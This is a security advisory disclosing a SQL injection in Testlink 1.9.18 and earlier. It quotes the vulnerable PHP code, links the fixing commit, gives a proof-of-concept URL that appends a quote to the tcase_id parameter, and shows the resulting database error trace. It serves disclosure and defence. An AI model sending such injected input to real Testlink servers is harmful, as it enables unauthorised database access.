Affected software: Testlink 1.9.18 and prior
Credit: Maksymilian Arciemowicz (CXSECURITY)

Affected code:
----------------
$tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null;
$tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0;
$info = '';
if( !is_null($tcase_id) )
{
	if($tcversion_id > 0 )
	{ 
		$tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id);
----------------


Patch:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3

PoC
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27


Error message and SQL Syntax:
============================================================================== 
 DB Access Error - debug_print_backtrace() OUTPUT START 
 ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200) 
            Having this additional Information could be useful for reporting 
            issue to development TEAM. 
============================================================================== 
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]